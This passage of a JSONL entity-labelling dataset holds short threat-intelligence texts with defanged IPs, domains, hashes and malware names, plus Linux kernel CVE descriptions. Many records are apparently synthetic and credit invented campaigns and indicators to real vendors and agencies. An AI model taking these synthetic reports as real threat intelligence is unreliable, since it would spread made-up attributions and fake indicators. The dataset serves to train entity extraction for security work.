] 139 for C2.", "spans": {"Vulnerability: CVE-2023-46500": [[24, 38]], "Vulnerability: type confusion": [[53, 67]], "System: Ubuntu 22.04": [[78, 90]], "Organization: Rapid7": [[92, 98]], "Malware: TrickBot": [[180, 188]], "Indicator: ee0508d79eda99bc7532b2fab948d2a2783d945d49b281c83991cb91779ec170": [[198, 262]], "Indicator: http://datadata.site/secure/token": [[347, 384]], "Indicator: 192.146.55.139": [[405, 437]]}, "info": {"id": "synth_v2_00661", "source": "defanged_augment"}} {"text": "A backdoor also known as: W32.Sality.PE Win32.Sality.3 Virus/W32.Sality.D Worm.Dumpy.S19687 Win32.Sality.3 Virus.Sality.Win32.25 Win32.Sality.3 Win32.Sality.3 W32.Sality.AE Win32/Sality.AA PE_SALITY.RL Trojan-Ransom.Win32.Blocker.gfeq Virus.Win32.Sality.beygb Win32.Sality.3 Win32.Sality.3 Win32.Sector.30 BehavesLike.Win32.Sality.cm Win32/HLLP.Kuku.poly2 W32/Sality[ . ]AT Worm:Win32/Dumpy.B Trojan-Ransom.Win32.Blocker.gfeq Win32.Virus.Sality.A HEUR/Fakon.mwf Virus.Win32.Sality.bakc Worm.AutoRun W32/Sality.AA Win32.Sality Win32/Sality.NBA Trojan-Ransom.Win32.Blocker.b Win32.Sality.BL Worm.Win32.Dumpy Virus.Win32.Sality.I", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: Sality.AT": [[360, 373]]}, "info": {"id": "cyner2_train_006069", "source": "defanged_augment"}} {"text": "Blog Post by Dragos: Tracking Aqua Blizzard's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2023-45005 against Ubuntu 22.04 deployments. The initial access vector involves spear-phishing emails from service@account-update[.]xyz delivering PikaBot. Post-compromise, the attackers deploy Qbot and use Mimikatz for reconnaissance. C2 infrastructure includes 202[.]163[.]249[.]139 and data-relay[ . ]xyz. A staging server at hxxp://backup-secure[.]net/admin/config hosts additional tooling. 
Key artifact: /usr/local/bin/beacon.dll (MD5: 15cc660ae2c71df3dad5530a440cd9ec).", "spans": {"Organization: Dragos": [[13, 19]], "Vulnerability: CVE-2023-45005": [[123, 137]], "System: Ubuntu 22.04": [[146, 158]], "Indicator: service@account-update.xyz": [[234, 262]], "Malware: PikaBot": [[274, 281]], "Malware: Qbot": [[321, 325]], "Indicator: 202.163.249.139": [[390, 411]], "Indicator: data-relay.xyz": [[416, 434]], "Indicator: http://backup-secure.net/admin/config": [[456, 495]], "Indicator: 15cc660ae2c71df3dad5530a440cd9ec": [[568, 600]]}, "info": {"id": "synth_v2_01663", "source": "defanged_augment"}} {"text": "Artifact Analysis for RedLine Stealer campaign:\nStage 1 dropper at C:\\Users\\admin\\Downloads\\helper.sh - SHA1: afbf4afad2e0896a7a492e61c56d5297f2c63845\nStage 2 loader at /dev/shm/sam.hive - SHA256: e84a3b7ceea13a82300c89cba3314bea18626113e959556ab27b5b64a287255b\nFinal payload at /tmp/helper.sh - MD5: 31ca3b8e0d1dd4218c4bdde7b6a65c8a\nExfiltration module - SHA256: 838b706f2a80971e26961eef2a91eefa4d90434c49f2a8c970f70809b552ae93\nAll stages communicated with 10 [ . ] 174 [ . ] 96 [ . ] 248. Rubeus signatures detected in Stage 2.", "spans": {"Malware: RedLine Stealer": [[22, 37]], "Indicator: afbf4afad2e0896a7a492e61c56d5297f2c63845": [[110, 150]], "Indicator: e84a3b7ceea13a82300c89cba3314bea18626113e959556ab27b5b64a287255b": [[197, 261]], "Indicator: 31ca3b8e0d1dd4218c4bdde7b6a65c8a": [[301, 333]], "Indicator: 838b706f2a80971e26961eef2a91eefa4d90434c49f2a8c970f70809b552ae93": [[364, 428]], "Indicator: 10.174.96.248": [[458, 489]]}, "info": {"id": "synth_v2_01932", "source": "defanged_augment"}} {"text": "PLATINUM has used several zero-day exploits against their victims . Kaspersky Lab 's products detect the Microsoft Office exploits used in the spear-phishing attacks , including Exploit[ . ]MSWord[ . 
]CVE-2010-333 , Exploit[.]Win32[.]CVE-2012-0158 .", "spans": {"Vulnerability: zero-day exploits": [[26, 43]], "Organization: Kaspersky Lab": [[68, 81]], "Organization: Microsoft Office": [[105, 121]], "Vulnerability: exploits": [[122, 130]], "Indicator: Exploit.MSWord.CVE-2010-333": [[178, 213]], "Indicator: Exploit.Win32.CVE-2012-0158": [[216, 247]]}, "info": {"id": "cyberner_stix_train_003244", "source": "defanged_augment"}} {"text": "An unsafe default configuration in KNIME Analytics Platform before 5.2.0 allows for a cross-site scripting attack. When KNIME Analytics Platform is used as an executor for either KNIME Server or KNIME Business Hub several JavaScript-based view nodes do not sanitize the data that is displayed by default. If the data to be displayed contains JavaScript this code is executed in the browser and can perform any operations that the current user is allowed to perform silently.\n\n\n\n\nKNIME Analytics Platform already has configuration options with which sanitization of data can be actived, see hxxps://docs[.]knime[.]com/latest/webportal_admin_guide/index.html#html-sanitization-webportal hxxps://docs[.]knime[.]com/latest/webportal_admin_guide/index.html#html-sanitization-webportal . However, these are off by default which allows for cross-site scripting attacks.\n\n\nKNIME Analytics Platform 5.2.0 will enable sanitization by default. For all previous releases we recommend users to add the corresponding settings to the executor's knime.ini.", "spans": {"Indicator: https://docs.knime.com/latest/webportal_admin_guide/index.html#html-sanitization-webportal": [[591, 685], [686, 780]], "Vulnerability: cross-site scripting": [[86, 106], [834, 854]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2023-5562"}} {"text": "Blog Post by Volexity: Tracking Ember Bear's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2023-34911 against Zyxel USG deployments. 
The initial access vector involves spear-phishing emails from it@mail-service[ . ]info delivering Cobalt Strike. Post-compromise, the attackers deploy Amadey and use LaZagne for reconnaissance. C2 infrastructure includes 127[.]168[.]83[.]180 and static-cache[ . ]cc. A staging server at hxxps://cloudportal[ . ]cc/panel/index.html hosts additional tooling. Key artifact: /usr/local/bin/taskhost.exe (MD5: a7f5198a88f102acbd79016294f39965).", "spans": {"Organization: Volexity": [[13, 21]], "Vulnerability: CVE-2023-34911": [[122, 136]], "System: Zyxel USG": [[145, 154]], "Indicator: it@mail-service.info": [[230, 254]], "Malware: Cobalt Strike": [[266, 279]], "Malware: Amadey": [[319, 325]], "Indicator: 127.168.83.180": [[389, 409]], "Indicator: static-cache.cc": [[414, 433]], "Indicator: hxxps://cloudportal.cc/panel/index.html": [[455, 498]], "Indicator: a7f5198a88f102acbd79016294f39965": [[573, 605]]}, "info": {"id": "synth_v2_01681", "source": "defanged_augment"}} {"text": "Phishing Campaign Report: Microsoft MSRC identified a large-scale phishing operation. Emails originated from hr@document-share[ . ]link and service@login-portal[.]tech, spoofing legitimate services. Victims were directed to hxxp://update-static[ . ]live/download/update.exe which hosted a credential harvesting page on gateway-api[.]site. A secondary link hxxps://portal-auth[.]com/collect delivered Vidar (SHA256: ab0f4d1f456f257fe6dce53c120f65d48393c9fdd6aebee8f6b191a6009ca746). 
The malware was saved to C:\\Users\\Public\\Documents\\ntds.dit and established C2 with 92[.]163[.]230[.]176.", "spans": {"Organization: Microsoft MSRC": [[26, 40]], "Indicator: hr@document-share.link": [[109, 135]], "Indicator: service@login-portal.tech": [[140, 167]], "Indicator: http://update-static.live/download/update.exe": [[224, 273]], "Indicator: gateway-api.site": [[319, 337]], "Indicator: hxxps://portal-auth.com/collect": [[356, 389]], "Malware: Vidar": [[400, 405]], "Indicator: ab0f4d1f456f257fe6dce53c120f65d48393c9fdd6aebee8f6b191a6009ca746": [[415, 479]], "Indicator: 92.163.230.176": [[566, 586]]}, "info": {"id": "synth_v2_01010", "source": "defanged_augment"}} {"text": "IOC Bulletin - IcedID Campaign:\nNetwork Indicators:\n- 172[.]15[.]241[.]58\n- 10 [ . ] 79 [ . ] 28 [ . ] 209\n- 99 [ . ] 224 [ . ] 222 [ . ] 104\n- backupupdate[.]tech\n- secure-sync[ . ]org\nURLs:\n- hxxp://gateway-cache[.]info/secure/token\n- hxxp://secure-node[.]club/api/v2/auth\nEmail Senders:\n- updates@urgent-notice[ . ]online\n- admin@auth-check[ . ]org\nFile Indicators:\n- SHA1: af3927f6fcab3290177351a4ad04408c0596b7ee\n- SHA1: 104137e6b283615d57085631a535fec195bc3d92\n- Drop path: C:\\ProgramData\\helper.sh", "spans": {"Malware: IcedID": [[15, 21]], "Indicator: 172.15.241.58": [[54, 73]], "Indicator: 10.79.28.209": [[76, 106]], "Indicator: 99.224.222.104": [[109, 141]], "Indicator: backupupdate.tech": [[144, 163]], "Indicator: secure-sync.org": [[166, 185]], "Indicator: hxxp://gateway-cache.info/secure/token": [[194, 234]], "Indicator: http://secure-node.club/api/v2/auth": [[237, 274]], "Indicator: updates@urgent-notice.online": [[292, 324]], "Indicator: admin@auth-check.org": [[327, 351]], "Indicator: af3927f6fcab3290177351a4ad04408c0596b7ee": [[377, 417]], "Indicator: 104137e6b283615d57085631a535fec195bc3d92": [[426, 466]]}, "info": {"id": "synth_v2_01500", "source": "defanged_augment"}} {"text": "A backdoor also known as: W32.Virut.G W32/Trojan3.ATP W32[ . ]Virut[ . 
]CF W32/Virut.BS Win32/Virut.17408 PE_VIRUX.A-3 Virus.Win32.Virut.ce Win32.Virut.AM Virus.Win32.Virut.Ce Win32.Virut.56 PE_VIRUX.A-3 Heuristic.BehavesLike.Win32.ModifiedUPX.J Win32/Virut.bn Win32.Virut.nd.53248 Virus:Win32/Virut.BN Win32/Virut.F W32/Trojan3.ATP Virus.Virut.06 Win32/Virut.NBP Win32.Obduran.a W32/Sality.AO", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: W32.Virut.CF": [[54, 74]]}, "info": {"id": "cyner2_train_002617", "source": "defanged_augment"}} {"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/tunnel: wait until all sk_user_data reader finish before releasing the sock\n\nThere is a race condition in vxlan that when deleting a vxlan device\nduring receiving packets, there is a possibility that the sock is\nreleased after getting vxlan_sock vs from sk_user_data. Then in\nlater vxlan_ecn_decapsulate(), vxlan_get_sk_family() we will got\nNULL pointer dereference. e.g.\n\n #0 [ffffa25ec6978a38] machine_kexec at ffffffff8c669757\n #1 [ffffa25ec6978a90] __crash_kexec at ffffffff8c7c0a4d\n #2 [ffffa25ec6978b58] crash_kexec at ffffffff8c7c1c48\n #3 [ffffa25ec6978b60] oops_end at ffffffff8c627f2b\n #4 [ffffa25ec6978b80] page_fault_oops at ffffffff8c678fcb\n #5 [ffffa25ec6978bd8] exc_page_fault at ffffffff8d109542\n #6 [ffffa25ec6978c00] asm_exc_page_fault at ffffffff8d200b62\n [exception RIP: vxlan_ecn_decapsulate+0x3b]\n RIP: ffffffffc1014e7b RSP: ffffa25ec6978cb0 RFLAGS: 00010246\n RAX: 0000000000000008 RBX: ffff8aa000888000 RCX: 0000000000000000\n RDX: 000000000000000e RSI: ffff8a9fc7ab803e RDI: ffff8a9fd1168700\n RBP: ffff8a9fc7ab803e R8: 0000000000700000 R9: 00000000000010ae\n R10: ffff8a9fcb748980 R11: 0000000000000000 R12: ffff8a9fd1168700\n R13: ffff8aa000888000 R14: 00000000002a0000 R15: 00000000000010ae\n ORIG_RAX: ffffffffffffffff CS: 0010 SS: 0018\n #7 [ffffa25ec6978ce8] vxlan_rcv at ffffffffc10189cd [vxlan]\n #8 [ffffa25ec6978d90] udp_queue_rcv_one_skb at ffffffff8cfb6507\n #9 [ffffa25ec6978dc0] 
udp_unicast_rcv_skb at ffffffff8cfb6e45\n #10 [ffffa25ec6978dc8] __udp4_lib_rcv at ffffffff8cfb8807\n #11 [ffffa25ec6978e20] ip_protocol_deliver_rcu at ffffffff8cf76951\n #12 [ffffa25ec6978e48] ip_local_deliver at ffffffff8cf76bde\n #13 [ffffa25ec6978ea0] __netif_receive_skb_one_core at ffffffff8cecde9b\n #14 [ffffa25ec6978ec8] process_backlog at ffffffff8cece139\n #15 [ffffa25ec6978f00] __napi_poll at ffffffff8ceced1a\n #16 [ffffa25ec6978f28] net_rx_action at ffffffff8cecf1f3\n #17 [ffffa25ec6978fa0] __softirqentry_text_start at ffffffff8d4000ca\n #18 [ffffa25ec6978ff0] do_softirq at ffffffff8c6fbdc3\n\nReproducer: hxxps://github[ . ]com/Mellanox/ovs-tests/blob/master/test-ovs-vxlan-remove-tunnel-during-traffic.sh\n\nFix this by waiting for all sk_user_data reader to finish before\nreleasing the sock.", "spans": {"Indicator: https://github.com/Mellanox/ovs-tests/blob/master/test-ovs-vxlan-remove-tunnel-during-traffic.sh": [[2179, 2279]], "System: Linux kernel": [[7, 19]], "Vulnerability: NULL pointer dereference": [[414, 438]], "Vulnerability: race condition": [[161, 175]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2022-50405"}} {"text": "A backdoor also known as: Trojan.BitMiner Trojan.Zusy.D41F53 Tool.BtcMine.1195 Backdoor.PePatch.Win32.108542 BehavesLike.Win32.Backdoor.th PUA.CoinMiner RiskTool[.]BitMiner[.]au RiskWare[RiskTool]/Win32.BitCoinMiner Trojan:Win32/Optiminz.A Unwanted/Win32.BitCoinMiner.R215923 Trj/CI.A Win32/Virus.RiskTool.435", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: RiskTool.BitMiner.au": [[153, 177]]}, "info": {"id": "cyner2_train_000174", "source": "defanged_augment"}} {"text": "Incident Response Summary: On detection of anomalous traffic to 172 [ . ] 99 [ . ] 125 [ . ] 186, the Symantec IR team identified AgentTesla running as C:\\Users\\Public\\Documents\\taskhost.exe. The threat actor, believed to be Turla, used PsExec for credential harvesting and Sharphound for lateral movement. 
Exfiltrated data was sent to login-update[.]top and auth-relay[.]dev. The initial dropper (MD5: 758fcc649322166d0904b50317ae0dd1) was delivered via a phishing email from security@secure-verify[ . ]net. A second C2 node was observed at 198 [ . ] 133 [ . ] 26 [ . ] 71, with a persistence mechanism writing to C:\\Windows\\System32\\agent.py.", "spans": {"Indicator: 172.99.125.186": [[64, 96]], "Organization: Symantec": [[102, 110]], "Malware: AgentTesla": [[130, 140]], "Indicator: login-update.top": [[336, 354]], "Indicator: auth-relay.dev": [[359, 375]], "Indicator: 758fcc649322166d0904b50317ae0dd1": [[403, 435]], "Indicator: security@secure-verify.net": [[477, 507]], "Indicator: 198.133.26.71": [[542, 573]]}, "info": {"id": "synth_v2_00382", "source": "defanged_augment"}} {"text": "Blog Post by CISA: Tracking BlackTech's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2025-13087 against Palo Alto PAN-OS deployments. The initial access vector involves spear-phishing emails from notification@credential-check[.]site delivering PlugX. Post-compromise, the attackers deploy Amadey and use PowerShell Empire for reconnaissance. C2 infrastructure includes 185[.]66[.]198[.]205 and edgeproxy[.]tech. A staging server at hxxps://cloud-api[ . ]com/assets/js/payload.js hosts additional tooling. 
Key artifact: C:\\ProgramData\\backdoor.elf (SHA1: 9fed3db381c16e81ef3ec24c22be8d33a1bd50a7).", "spans": {"Organization: CISA": [[13, 17]], "Vulnerability: CVE-2025-13087": [[117, 131]], "System: Palo Alto PAN-OS": [[140, 156]], "Indicator: notification@credential-check.site": [[232, 268]], "Malware: PlugX": [[280, 285]], "Malware: Amadey": [[325, 331]], "Indicator: 185.66.198.205": [[405, 425]], "Indicator: edgeproxy.tech": [[430, 446]], "Indicator: https://cloud-api.com/assets/js/payload.js": [[468, 514]], "Indicator: 9fed3db381c16e81ef3ec24c22be8d33a1bd50a7": [[590, 630]]}, "info": {"id": "synth_v2_01525", "source": "defanged_augment"}} {"text": "REDBALDKNIGHT , also known as BRONZE BUTLER and Tick , is a cyberespionage group known to target Japan such as government agencies as well as those in biotechnology , electronics manufacturing , and industrial chemistry . Around the same time , WildFire also captured an e-mail containing a Word document ( \" hello[ . ]docx \" ) with an identical hash as the earlier Word document , this time sent to a U.S. Government recipient .", "spans": {"Organization: government agencies": [[111, 130]], "Organization: biotechnology": [[151, 164]], "Organization: electronics manufacturing": [[167, 192]], "Organization: industrial chemistry": [[199, 219]], "Organization: WildFire": [[245, 253]], "Indicator: hello.docx": [[309, 323]], "Organization: Government": [[407, 417]]}, "info": {"id": "cyberner_stix_train_002274", "source": "defanged_augment"}} {"text": "Vulnerability Advisory: CVE-2024-26162 is a critical null pointer dereference affecting Active Directory. FBI confirmed active exploitation by BlackTech in the wild. Exploitation delivers DanaBot (MD5: 048040f2ed2095a33f0587d234824275) which is dropped to /dev/shm/backdoor.elf. The exploit payload is hosted at hxxp://storagecloud[.]tech/callback and communicates to 204 [ . ] 232 [ . ] 205 [ . 
] 151 for C2.", "spans": {"Vulnerability: CVE-2024-26162": [[24, 38]], "Vulnerability: null pointer dereference": [[53, 77]], "System: Active Directory": [[88, 104]], "Organization: FBI": [[106, 109]], "Malware: DanaBot": [[188, 195]], "Indicator: 048040f2ed2095a33f0587d234824275": [[202, 234]], "Indicator: hxxp://storagecloud.tech/callback": [[312, 347]], "Indicator: 204.232.205.151": [[368, 401]]}, "info": {"id": "synth_v2_00820", "source": "defanged_augment"}} {"text": "The top level malware , CE8B99DF8642C065B6AF43FDE1F786A3 ( named by its authors “ msdeltemp[ . ]dll ” according to internal strings , and compiled July 28th , 2015 ) is a rare type of the Sofacy AZZY implant .", "spans": {"Indicator: CE8B99DF8642C065B6AF43FDE1F786A3": [[24, 56]], "Indicator: msdeltemp.dll": [[82, 99]], "Malware: AZZY": [[195, 199]]}, "info": {"id": "cyberner_stix_train_002507", "source": "defanged_augment"}} {"text": "In both these campaigns the activity group included remote triggers to deactivate exploitation , with an attempt to conceal the vulnerability , and prevent analysis of the attack . This file requires the target to attempt to open the [ . ]lnk file , which redirects the user to a Windows Scripting Component ( .wsc ) file , hosted on an adversary-controlled microblogging page .", "spans": {"Indicator: .lnk file": [[234, 247]], "System: Windows": [[280, 287]]}, "info": {"id": "cyberner_stix_train_004110", "source": "defanged_augment"}} {"text": "Forensic Investigation Notes: Analysis of the compromised host revealed Chisel artifacts at C:\\Users\\admin\\Desktop\\csrss.exe. Memory dump analysis confirmed execution of Ligolo. Registry modifications pointed to persistence via /opt/app/bin/lsass.dmp. Network forensics identified connections to 128[.]40[.]120[.]113 and gateway-data[ . ]cc. Email headers traced the initial vector to alert@account-update[ . ]xyz. 
File C:\\Users\\Public\\Documents\\implant.so (SHA256: 403bda1b5a63a0daa61c4dc0e67620662e09dd36ad7988bc99449fb97baf170d) was identified as the initial dropper. A staging URL hxxp://portalrelay[ . ]io/login resolved to 188[.]59[.]212[.]193. Secondary artifact hash: MD5: 63df7a51ded305d1a681b7aab547dfc5.", "spans": {"Indicator: 128.40.120.113": [[296, 316]], "Indicator: gateway-data.cc": [[321, 340]], "Indicator: alert@account-update.xyz": [[385, 413]], "Indicator: 403bda1b5a63a0daa61c4dc0e67620662e09dd36ad7988bc99449fb97baf170d": [[466, 530]], "Indicator: hxxp://portalrelay.io/login": [[585, 616]], "Indicator: 188.59.212.193": [[629, 649]], "Indicator: 63df7a51ded305d1a681b7aab547dfc5": [[681, 713]]}, "info": {"id": "synth_v2_01122", "source": "defanged_augment"}} {"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmm: gup: stop abusing try_grab_folio\n\nA kernel warning was reported when pinning folio in CMA memory when\nlaunching SEV virtual machine. The splat looks like:\n\n[ 464.325306] WARNING: CPU: 13 PID: 6734 at mm/gup.c:1313 __get_user_pages+0x423/0x520\n[ 464.325464] CPU: 13 PID: 6734 Comm: qemu-kvm Kdump: loaded Not tainted 6.6.33+ #6\n[ 464.325477] RIP: 0010:__get_user_pages+0x423/0x520\n[ 464.325515] Call Trace:\n[ 464.325520] \n[ 464.325523] ? __get_user_pages+0x423/0x520\n[ 464.325528] ? __warn+0x81/0x130\n[ 464.325536] ? __get_user_pages+0x423/0x520\n[ 464.325541] ? report_bug+0x171/0x1a0\n[ 464.325549] ? handle_bug+0x3c/0x70\n[ 464.325554] ? exc_invalid_op+0x17/0x70\n[ 464.325558] ? asm_exc_invalid_op+0x1a/0x20\n[ 464.325567] ? 
__get_user_pages+0x423/0x520\n[ 464.325575] __gup_longterm_locked+0x212/0x7a0\n[ 464.325583] internal_get_user_pages_fast+0xfb/0x190\n[ 464.325590] pin_user_pages_fast+0x47/0x60\n[ 464.325598] sev_pin_memory+0xca/0x170 [kvm_amd]\n[ 464.325616] sev_mem_enc_register_region+0x81/0x130 [kvm_amd]\n\nPer the analysis done by yangge, when starting the SEV virtual machine, it\nwill call pin_user_pages_fast(..., FOLL_LONGTERM, ...) to pin the memory. \nBut the page is in CMA area, so fast GUP will fail then fallback to the\nslow path due to the longterm pinnalbe check in try_grab_folio().\n\nThe slow path will try to pin the pages then migrate them out of CMA area.\nBut the slow path also uses try_grab_folio() to pin the page, it will\nalso fail due to the same check then the above warning is triggered.\n\nIn addition, the try_grab_folio() is supposed to be used in fast path and\nit elevates folio refcount by using add ref unless zero. We are guaranteed\nto have at least one stable reference in slow path, so the simple atomic add\ncould be used. The performance difference should be trivial, but the\nmisuse may be confusing and misleading.\n\nRedefined try_grab_folio() to try_grab_folio_fast(), and try_grab_page()\nto try_grab_folio(), and use them in the proper paths. This solves both\nthe abuse and the kernel warning.\n\nThe proper naming makes their usecase more clear and should prevent from\nabusing in the future.\n\npeterx said:\n\n: The user will see the pin fails, for gpu-slow it further triggers the WARN\n: right below that failure (as in the original report):\n: \n: folio = try_grab_folio(page, page_increm - 1,\n: foll_flags);\n: if (WARN_ON_ONCE(!folio)) { <------------------------ here\n: /*\n: * Release the 1st page ref if the\n: * folio is problematic, fail hard.\n: */\n: gup_put_folio(page_folio(page), 1,\n: foll_flags);\n: ret = -EFAULT;\n: goto out;\n: }\n\n[1] hxxps://lore[ . ]kernel[ . 
]org/linux-mm/1719478388-31917-1-git-send-email-yangge1116@126.com/\n\n[shy828301@gmail[.]com: fix implicit declaration of function try_grab_folio_fast]", "spans": {"Indicator: https://lore.kernel.org/linux-mm/1719478388-31917-1-git-send-email-yangge1116@126.com/": [[2915, 3009]], "Indicator: gmail.com": [[3022, 3033]], "System: Linux kernel": [[7, 19]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2024-44943"}} {"text": "Code contained inside one of the slides triggers an exploit for CVE-2017-8759 , a remote code execution vulnerability in Microsoft .NET framework . MXI Player appears to be a version of the Bahamut agent , designed to record the phone calls and collect other information about the user ( com[ . ]mxi[ . ]videoplay ) .", "spans": {"Malware: slides": [[33, 39]], "Vulnerability: CVE-2017-8759": [[64, 77]], "Indicator: MXI Player": [[148, 158]], "Indicator: com.mxi.videoplay": [[288, 313]]}, "info": {"id": "cyberner_stix_train_006423", "source": "defanged_augment"}} {"text": "Malware Analysis Report: Ryuk (MD5: bf20e740299d2a3d8f9f5c812bbb729d). Upon execution on VMware ESXi, the sample creates C:\\Users\\admin\\AppData\\Local\\Temp\\agent.py and injects into legitimate processes. Network analysis shows beaconing to 176[.]51[.]207[.]206 every 60 seconds and DNS queries to secure-storage[.]org. The second stage was fetched from hxxp://relayupdate[.]online/callback and written to C:\\Program Files\\Common Files\\backdoor.elf. The payload uses LinPEAS-style techniques for defense evasion. 
A secondary hash (SHA256: 17dcd73e3f9841a7ab14221b4569821faae79d57b8bd038623abeeaea8cd8976) was extracted from the unpacked payload.", "spans": {"Malware: Ryuk": [[25, 29]], "Indicator: bf20e740299d2a3d8f9f5c812bbb729d": [[36, 68]], "System: VMware ESXi": [[89, 100]], "Indicator: 176.51.207.206": [[239, 259]], "Indicator: secure-storage.org": [[296, 316]], "Indicator: http://relayupdate.online/callback": [[352, 388]], "Indicator: 17dcd73e3f9841a7ab14221b4569821faae79d57b8bd038623abeeaea8cd8976": [[537, 601]]}, "info": {"id": "synth_v2_00459", "source": "defanged_augment"}} {"text": "The screenshot below shows SpyNote RAT scanning for Wi-Fi and enabling it if a known channel is found : Additional features - SpyNote RAT could click photos using the device 's camera , based on commands from C & C . Group-IB experts established that the server 185[.]20[.]187[.]89 started functioning no later than 28 January 2019 . Since 2013 , the cybercrime gang have attempted to attack banks , e-payment systems and financial institutions using pieces of malware they designed , known as Carbanak and Cobalt .", "spans": {"Malware: SpyNote RAT": [[27, 38], [126, 137]], "Organization: Group-IB": [[217, 225]], "Organization: banks": [[392, 397]], "Organization: e-payment": [[400, 409]], "Organization: financial institutions": [[422, 444]], "Malware: Carbanak": [[494, 502]], "Malware: Cobalt": [[507, 513]], "Indicator: 185.20.187.89": [[262, 281]]}, "info": {"id": "cyberner_stix_train_007808", "source": "defanged_augment"}} {"text": "IOC Bulletin - FormBook Campaign:\nNetwork Indicators:\n- 102[.]22[.]89[.]57\n- 172[.]44[.]211[.]248\n- 87[.]11[.]214[.]196\n- sync-relay[ . ]tech\n- storagelogin[.]site\nURLs:\n- hxxp://data-portal[.]top/assets/js/payload.js\n- hxxps://login-relay[ . 
]club/api/v2/auth\nEmail Senders:\n- admin@phishing-domain[.]com\n- it@identity-verify[.]cc\nFile Indicators:\n- MD5: 42dc4c381a108d36af9abc0ca1d81fdb\n- SHA256: 2c5ffb2bf5b6595d8385c5811c5bf4a41fadafbe0b1b3d9ff09bbb09e67a7c6c\n- Drop path: /dev/shm/update.dll", "spans": {"Malware: FormBook": [[15, 23]], "Indicator: 102.22.89.57": [[56, 74]], "Indicator: 172.44.211.248": [[77, 97]], "Indicator: 87.11.214.196": [[100, 119]], "Indicator: sync-relay.tech": [[122, 141]], "Indicator: storagelogin.site": [[144, 163]], "Indicator: http://data-portal.top/assets/js/payload.js": [[172, 217]], "Indicator: https://login-relay.club/api/v2/auth": [[220, 260]], "Indicator: admin@phishing-domain.com": [[278, 305]], "Indicator: it@identity-verify.cc": [[308, 331]], "Indicator: 42dc4c381a108d36af9abc0ca1d81fdb": [[356, 388]], "Indicator: 2c5ffb2bf5b6595d8385c5811c5bf4a41fadafbe0b1b3d9ff09bbb09e67a7c6c": [[399, 463]]}, "info": {"id": "synth_v2_01368", "source": "defanged_augment"}} {"text": "INDICATORS OF COMPROMISE ( IOCS ) Domains Facebook-photos-au[.]su Homevideo2-12l[ . ]ml videohosting1-5j[ . ]gq URLs hxxp : //88.99.227 [ . Between February and March 2019 , probable MuddyWater-associated samples indicated that BlackWater established persistence on the compromised host , at used PowerShell commands to enumerate the victim 's machine and contained the IP address of the actor 's command and control ( C2 ) . It beacons to domain connect[.]bafunpda[.]xyz and attempts to connect to TCP port 4433 . They once attacked a game server to illicitly farm in - game currency ( “ gaming gold ” , which also has real - world value ) and stole source codes of online game projects .", "spans": {"Indicator: connect.bafunpda.xyz": [[447, 471]], "Indicator: Facebook-photos-au.su": [[42, 65]], "Indicator: Homevideo2-12l.ml": [[66, 87]], "Indicator: videohosting1-5j.gq": [[88, 111]]}, "info": {"id": "cyberner_stix_train_007621", "source": "defanged_augment"}} {"text": "] 230 [ . 
This is in stark contrast to some other suspected Russian threat actors ( such as Operation Pawn Storm ) who appear to have increased their targeting of Ukraine following the crisis . The image below depicts the contents of the o402ek2m[.]php file . The Systemd configuration file leveraged by Sandworm enabled the group to maintain persistence on systems .", "spans": {"Indicator: o402ek2m.php": [[238, 252]]}, "info": {"id": "cyberner_stix_train_002723", "source": "defanged_augment"}} {"text": "In the Linux kernel, the following vulnerability has been resolved:\n\narm64: entry: fix ARM64_WORKAROUND_SPECULATIVE_UNPRIV_LOAD\n\nCurrently the ARM64_WORKAROUND_SPECULATIVE_UNPRIV_LOAD workaround isn't\nquite right, as it is supposed to be applied after the last explicit\nmemory access, but is immediately followed by an LDR.\n\nThe ARM64_WORKAROUND_SPECULATIVE_UNPRIV_LOAD workaround is used to\nhandle Cortex-A520 erratum 2966298 and Cortex-A510 erratum 3117295,\nwhich are described in:\n\n* hxxps://developer[.]arm[.]com/documentation/SDEN2444153/0600/?lang=en\n* hxxps://developer[.]arm[.]com/documentation/SDEN1873361/1600/?lang=en\n\nIn both cases the workaround is described as:\n\n| If pagetable isolation is disabled, the context switch logic in the\n| kernel can be updated to execute the following sequence on affected\n| cores before exiting to EL0, and after all explicit memory accesses:\n|\n| 1. A non-shareable TLBI to any context and/or address, including\n| unused contexts or addresses, such as a `TLBI VALE1 Xzr`.\n|\n| 2. 
A DSB NSH to guarantee completion of the TLBI.\n\nThe important part being that the TLBI+DSB must be placed \"after all\nexplicit memory accesses\".\n\nUnfortunately, as-implemented, the TLBI+DSB is immediately followed by\nan LDR, as we have:\n\n| alternative_if ARM64_WORKAROUND_SPECULATIVE_UNPRIV_LOAD\n| \ttlbi\tvale1, xzr\n| \tdsb\tnsh\n| alternative_else_nop_endif\n| alternative_if_not ARM64_UNMAP_KERNEL_AT_EL0\n| \tldr\tlr, [sp, #S_LR]\n| \tadd\tsp, sp, #PT_REGS_SIZE\t\t// restore sp\n| \teret\n| alternative_else_nop_endif\n|\n| [ ... KPTI exception return path ... ]\n\nThis patch fixes this by reworking the logic to place the TLBI+DSB\nimmediately before the ERET, after all explicit memory accesses.\n\nThe ERET is currently in a separate alternative block, and alternatives\ncannot be nested. To account for this, the alternative block for\nARM64_UNMAP_KERNEL_AT_EL0 is replaced with a single alternative branch\nto skip the KPTI logic, with the new shape of the logic being:\n\n| alternative_insn \"b .L_skip_tramp_exit_\\@\", nop, ARM64_UNMAP_KERNEL_AT_EL0\n| \t[ ... KPTI exception return path ... ]\n| .L_skip_tramp_exit_\\@:\n|\n| \tldr\tlr, [sp, #S_LR]\n| \tadd\tsp, sp, #PT_REGS_SIZE\t\t// restore sp\n|\n| alternative_if ARM64_WORKAROUND_SPECULATIVE_UNPRIV_LOAD\n| \ttlbi\tvale1, xzr\n| \tdsb\tnsh\n| alternative_else_nop_endif\n| \teret\n\nThe new structure means that the workaround is only applied when KPTI is\nnot in use; this is fine as noted in the documented implications of the\nerratum:\n\n| Pagetable isolation between EL0 and higher level ELs prevents the\n| issue from occurring.\n\n... 
